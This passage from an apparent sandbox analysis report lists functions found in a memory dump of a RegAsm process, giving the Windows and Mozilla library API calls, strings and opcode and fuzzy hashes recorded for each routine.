                                                          • Part of subcall function 6C0FAB89: EnterCriticalSection.KERNEL32(6C14E370,?,?,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284), ref: 6C0FAB94
                                                          • Part of subcall function 6C0FAB89: LeaveCriticalSection.KERNEL32(6C14E370,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284,?,?,6C0E56F6), ref: 6C0FABD1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                        • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                        • API String ID: 3634367004-706389432
                                                        • Opcode ID: f293fa49852d511afe591a41cc284d53dc98bd2c142959381c48bf4f44f7f778
                                                        • Instruction ID: 2ca3924f5bd36023496c020fe02053da152a29cad73ee6c21aeda21e222d3e7e
                                                        • Opcode Fuzzy Hash: f293fa49852d511afe591a41cc284d53dc98bd2c142959381c48bf4f44f7f778
                                                        • Instruction Fuzzy Hash: 5B317075F002459BDF04EFB9C848FAE77F9FB4A309F108019E915A3750DA74A906DB61
                                                        Function 6C0C4480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: free$moz_xmalloc
                                                        • String ID:
                                                        • API String ID: 3009372454-0
                                                        • Opcode ID: e955ba76911707104f105d5c27395658f1badcc2383822b7dad54810e6bee8fe
                                                        • Instruction ID: 8676efc88806594bf60c5317c32274561f5473b9ae82c68e0b25efe171e6e134
                                                        • Opcode Fuzzy Hash: e955ba76911707104f105d5c27395658f1badcc2383822b7dad54810e6bee8fe
                                                        • Instruction Fuzzy Hash: B9B1EF72B001119FDB188EACC8E077D76F6BF46328F584669E816DBBC6D73099448B83
                                                        Function 6C12AC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                        • String ID:
                                                        • API String ID: 1192971331-0
                                                        • Opcode ID: fe356a994a67642de4b522e886bfa0cb019fd41c777b2ac17bbd05ec5c950266
                                                        • Instruction ID: a4ce47392aed821c436f5b604222000164aa9dd15a102ae14992864fc3f75103
                                                        • Opcode Fuzzy Hash: fe356a994a67642de4b522e886bfa0cb019fd41c777b2ac17bbd05ec5c950266
                                                        • Instruction Fuzzy Hash: BD3140B1A047058FDB00BF7DD64866EBBF0FF85309F01892DE99997211EB749598CB82
                                                        Function 6C0FF2B0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 140COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0FD9DB), ref: 6C0FF2D2
                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,00000000), ref: 6C0FF2F5
                                                        • moz_xmalloc.MOZGLUE(?,?,00000000), ref: 6C0FF386
                                                        • moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6C0FF347
                                                          • Part of subcall function 6C0DCA10: malloc.MOZGLUE(?), ref: 6C0DCA26
                                                        • moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6C0FF3C8
                                                        • free.MOZGLUE(00000000,00000000), ref: 6C0FF3F3
                                                        • free.MOZGLUE(00000000,00000000), ref: 6C0FF3FC
                                                        • free.MOZGLUE(00000000,?,?,00000000), ref: 6C0FF413
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: freemoz_xmalloc$HandleModule$malloc
                                                        • String ID: ntdll.dll
                                                        • API String ID: 301460908-2227199552
                                                        • Opcode ID: de86ba59d8bd8230d5a33bd9ad1092eaf392ddc119820555a2918354f2ce8fe3
                                                        • Instruction ID: 562cf8e4d9ff7b9d0ab632293e9eb74535653b9af781401956abf187625cdde2
                                                        • Opcode Fuzzy Hash: de86ba59d8bd8230d5a33bd9ad1092eaf392ddc119820555a2918354f2ce8fe3
                                                        • Instruction Fuzzy Hash: 244103B5A043158BDB049F28D84479E77F9EF8531CF25842DDD2AA7B80EB70B486C781
                                                        Function 6C126A10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 115stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InitializeCriticalSection.KERNEL32(6C14F618), ref: 6C126A68
                                                        • GetCurrentProcess.KERNEL32 ref: 6C126A7D
                                                        • GetCurrentProcess.KERNEL32 ref: 6C126AA1
                                                        • EnterCriticalSection.KERNEL32(6C14F618), ref: 6C126AAE
                                                        • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C126AE1
                                                        • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C126B15
                                                        • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C126B65
                                                        • LeaveCriticalSection.KERNEL32(6C14F618,?,?), ref: 6C126B83
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CriticalSectionstrncpy$CurrentProcess$EnterInitializeLeave
                                                        • String ID: SymInitialize
                                                        • API String ID: 3103739362-3981310019
                                                        • Opcode ID: d169302dbdc5d2c6b2a87ed3e3c5df54b6062694cb17da8e2efd8b08bc89eb6b
                                                        • Instruction ID: ce3d37696a5309f5999d57c959e69380ca87ee9889773df13dc41043b6bc851f
                                                        • Opcode Fuzzy Hash: d169302dbdc5d2c6b2a87ed3e3c5df54b6062694cb17da8e2efd8b08bc89eb6b
                                                        • Instruction Fuzzy Hash: 0A41AE747053449FDB01EF74C888B9A7BB8EF56308F088079ED58DB282DBB49548CBA1
                                                        Function 6C0D9620 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C0D9675
                                                        • __Init_thread_footer.LIBCMT ref: 6C0D9697
                                                        • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C0D96E8
                                                        • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C0D9707
                                                        • __Init_thread_footer.LIBCMT ref: 6C0D971F
                                                        • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C0D9773
                                                          • Part of subcall function 6C0FAB89: EnterCriticalSection.KERNEL32(6C14E370,?,?,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284), ref: 6C0FAB94
                                                          • Part of subcall function 6C0FAB89: LeaveCriticalSection.KERNEL32(6C14E370,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284,?,?,6C0E56F6), ref: 6C0FABD1
                                                        • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C0D97B7
                                                        • FreeLibrary.KERNEL32 ref: 6C0D97D0
                                                        • FreeLibrary.KERNEL32 ref: 6C0D97EB
                                                        • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C0D9824
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
                                                        • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                        • API String ID: 409848716-3880535382
                                                        • Opcode ID: 553418dea4ba25f43844b4c67d934a032bd21be06f4570a04142f27bb717f968
                                                        • Instruction ID: dd9633c4572e673c4e116aeca96fe36019d197a932ac37265620f7c0047ba4f0
                                                        • Opcode Fuzzy Hash: 553418dea4ba25f43844b4c67d934a032bd21be06f4570a04142f27bb717f968
                                                        • Instruction Fuzzy Hash: 8441CDB46003019BDF00EFA5D994B8A7BF5EB4931EF018128ED2597740DB34A905DFA1
                                                        Function 6C0C1E90 Relevance: 15.1, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(6C14E784), ref: 6C0C1EC1
                                                        • LeaveCriticalSection.KERNEL32(6C14E784), ref: 6C0C1EE1
                                                        • EnterCriticalSection.KERNEL32(6C14E744), ref: 6C0C1F38
                                                        • LeaveCriticalSection.KERNEL32(6C14E744), ref: 6C0C1F5C
                                                        • VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C0C1F83
                                                        • LeaveCriticalSection.KERNEL32(6C14E784), ref: 6C0C1FC0
                                                        • EnterCriticalSection.KERNEL32(6C14E784), ref: 6C0C1FE2
                                                        • LeaveCriticalSection.KERNEL32(6C14E784), ref: 6C0C1FF6
                                                        • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C0C2019
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
                                                        • String ID: MOZ_CRASH()
                                                        • API String ID: 2055633661-2608361144
                                                        • Opcode ID: 2e7d7707f31402b86ec961066bef34d66f6cbc444bf0bf341dadd5bd64ecfc85
                                                        • Instruction ID: 36446b6e07dcdb3ddea81b52aaef57f2f050156cdfece69412ba623f9c07e61c
                                                        • Opcode Fuzzy Hash: 2e7d7707f31402b86ec961066bef34d66f6cbc444bf0bf341dadd5bd64ecfc85
                                                        • Instruction Fuzzy Hash: CF41E475B053158BDF10EF78C888B6E7AF5EF4935DF008025E914A7741DB7099059BD2
                                                        Function 6C125FF0 Relevance: 15.1, APIs: 10, Instructions: 76COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsDebuggerPresent.KERNEL32 ref: 6C126009
                                                        • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C126024
                                                        • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(6C0CEE51,?), ref: 6C126046
                                                        • OutputDebugStringA.KERNEL32(?,6C0CEE51,?), ref: 6C126061
                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C126069
                                                        • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C126073
                                                        • _dup.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C126082
                                                        • _fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6C14148E), ref: 6C126091
                                                        • __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,6C0CEE51,00000000,?), ref: 6C1260BA
                                                        • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C1260C4
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: PrintfTarget@mozilla@@$?vprint@DebugDebuggerOutputPresentString__acrt_iob_func__stdio_common_vfprintf_dup_fdopen_filenofclose
                                                        • String ID:
                                                        • API String ID: 3835517998-0
                                                        • Opcode ID: 9d79c1ccf792101da3006f8e1dffd56bbf98cd37b152e54cb6a0ccb4600938bd
                                                        • Instruction ID: 202aa5eb5c78b5670a9c70a3c7c36b170eb1514f4f837f7548b756cc187070ad
                                                        • Opcode Fuzzy Hash: 9d79c1ccf792101da3006f8e1dffd56bbf98cd37b152e54cb6a0ccb4600938bd
                                                        • Instruction Fuzzy Hash: 0D21D671A002089FDB106F24DC08B9E7BB8FF45218F10C468E81E97280DB74A559CFD1
                                                        Function 6C110000 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 127threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0D4A68), ref: 6C10945E
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C109470
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C109482
                                                          • Part of subcall function 6C109420: __Init_thread_footer.LIBCMT ref: 6C10949F
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C110039
                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C110041
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C110075
                                                        • AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C110082
                                                        • moz_xmalloc.MOZGLUE(00000048), ref: 6C110090
                                                        • free.MOZGLUE(?), ref: 6C110104
                                                        • ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C11011B
                                                        Strings
                                                        • [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu), xrefs: 6C11005B
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpidfreemoz_xmalloc
                                                        • String ID: [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu)
                                                        • API String ID: 3012294017-637075127
                                                        • Opcode ID: a0eacb3df5d43129bfdb0b7307803d8c22db180d2a2804d7bcab2a4f605da99a
                                                        • Instruction ID: ac494e19818dbf22b42f6dd493b4ac60c8f920caf97df1bc6a1849f8d035c569
                                                        • Opcode Fuzzy Hash: a0eacb3df5d43129bfdb0b7307803d8c22db180d2a2804d7bcab2a4f605da99a
                                                        • Instruction Fuzzy Hash: 3F418EB5A047449FCB10DF64C840A9ABBF0FF4A328F44852DE96A97B40DB35F815CB91
                                                        Function 6C0D7E90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 116stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C0D7EA7
                                                        • malloc.MOZGLUE(00000001), ref: 6C0D7EB3
                                                          • Part of subcall function 6C0DCAB0: EnterCriticalSection.KERNEL32(?), ref: 6C0DCB49
                                                          • Part of subcall function 6C0DCAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C0DCBB6
                                                        • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C0D7EC4
                                                        • mozalloc_abort.MOZGLUE(?), ref: 6C0D7F19
                                                        • malloc.MOZGLUE(?), ref: 6C0D7F36
                                                        • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C0D7F4D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
                                                        • String ID: d
                                                        • API String ID: 204725295-2564639436
                                                        • Opcode ID: 83c1d1e1c5d97c870879ef564acf5b58a10425c951bdcfb1933cc04c263fdf95
                                                        • Instruction ID: b0c073b307d915ed83a73a163432686fe83a9a3bbed5a9d5ce1b63213856ccc2
                                                        • Opcode Fuzzy Hash: 83c1d1e1c5d97c870879ef564acf5b58a10425c951bdcfb1933cc04c263fdf95
                                                        • Instruction Fuzzy Hash: 1531F861E0035897DB00EB68DC04AFEB7B8EF9520CF459628ED4957612FB70B6C8C391
                                                        Function 6C0D3E80 Relevance: 13.7, APIs: 9, Instructions: 246memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL ref: 6C0D3EEE
                                                        • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C0D3FDC
                                                        • RtlAllocateHeap.NTDLL ref: 6C0D4006
                                                        • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C0D40A1
                                                        • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C0D3CCC), ref: 6C0D40AF
                                                        • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C0D3CCC), ref: 6C0D40C2
                                                        • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C0D4134
                                                        • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6C0D3CCC), ref: 6C0D4143
                                                        • RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6C0D3CCC), ref: 6C0D4157
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Free$Heap$StringUnicode$Allocate
                                                        • String ID:
                                                        • API String ID: 3680524765-0
                                                        • Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                        • Instruction ID: d8c303dc517aee4158334cf042ef4e51cbb145f485e1a4b8baa52b94734f7fff
                                                        • Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                        • Instruction Fuzzy Hash: EEA17DB5A00315DFEB40CF68C880759BBF5BF48308F2645A9D909AF752D771E886CBA0
                                                        Function 6C0C2030 Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 204memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memcpy.VCRUNTIME140(00000000,?,6C0E3F47,?,?,?,6C0E3F47,6C0E1A70,?), ref: 6C0C207F
                                                        • memset.VCRUNTIME140(?,000000E5,6C0E3F47,?,6C0E3F47,6C0E1A70,?), ref: 6C0C20DD
                                                        • VirtualFree.KERNEL32(00100000,00100000,00004000,?,6C0E3F47,6C0E1A70,?), ref: 6C0C211A
                                                        • EnterCriticalSection.KERNEL32(6C14E744,?,6C0E3F47,6C0E1A70,?), ref: 6C0C2145
                                                        • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004,?,6C0E3F47,6C0E1A70,?), ref: 6C0C21BA
                                                        • EnterCriticalSection.KERNEL32(6C14E744,?,6C0E3F47,6C0E1A70,?), ref: 6C0C21E0
                                                        • LeaveCriticalSection.KERNEL32(6C14E744,?,6C0E3F47,6C0E1A70,?), ref: 6C0C2232
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterVirtual$AllocFreeLeavememcpymemset
                                                        • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(node->mArena == this)
                                                        • API String ID: 889484744-884734703
                                                        • Opcode ID: 4f2f6bb2e50e8b1cdb01760e79ce8ac44b90daf1c7d9cc0c36749c8782283eb3
                                                        • Instruction ID: f91916413883a7c186c7179f56c1786ab3b723c603ff787fa9ea7d544f09ef5d
                                                        • Opcode Fuzzy Hash: 4f2f6bb2e50e8b1cdb01760e79ce8ac44b90daf1c7d9cc0c36749c8782283eb3
                                                        • Instruction Fuzzy Hash: E761D631F002168FCB04DA68C989B6E77F1AF95728F259135EA24A7F94D7709D00DB92
                                                        Function 6C0C48E0 Relevance: 13.7, APIs: 9, Instructions: 198COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • moz_xmalloc.MOZGLUE(8E8DFFFF,?,6C10483A,?), ref: 6C0C4ACB
                                                        • memcpy.VCRUNTIME140(-00000023,?,8E8DFFFF,?,?,6C10483A,?), ref: 6C0C4AE0
                                                        • moz_xmalloc.MOZGLUE(FFFE15BF,?,6C10483A,?), ref: 6C0C4A82
                                                          • Part of subcall function 6C0DCA10: mozalloc_abort.MOZGLUE(?), ref: 6C0DCAA2
                                                        • memcpy.VCRUNTIME140(-00000023,?,FFFE15BF,?,?,6C10483A,?), ref: 6C0C4A97
                                                        • moz_xmalloc.MOZGLUE(15D4E801,?,6C10483A,?), ref: 6C0C4A35
                                                          • Part of subcall function 6C0DCA10: malloc.MOZGLUE(?), ref: 6C0DCA26
                                                        • memcpy.VCRUNTIME140(-00000023,?,15D4E801,?,?,6C10483A,?), ref: 6C0C4A4A
                                                        • moz_xmalloc.MOZGLUE(15D4E824,?,6C10483A,?), ref: 6C0C4AF4
                                                        • moz_xmalloc.MOZGLUE(FFFE15E2,?,6C10483A,?), ref: 6C0C4B10
                                                        • moz_xmalloc.MOZGLUE(8E8E0022,?,6C10483A,?), ref: 6C0C4B2C
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: moz_xmalloc$memcpy$mallocmozalloc_abort
                                                        • String ID:
                                                        • API String ID: 4251373892-0
                                                        • Opcode ID: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
                                                        • Instruction ID: fe63e314c868db66968ee45f6e4eb22243c59c2cefd34d027eb74133bd80af58
                                                        • Opcode Fuzzy Hash: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
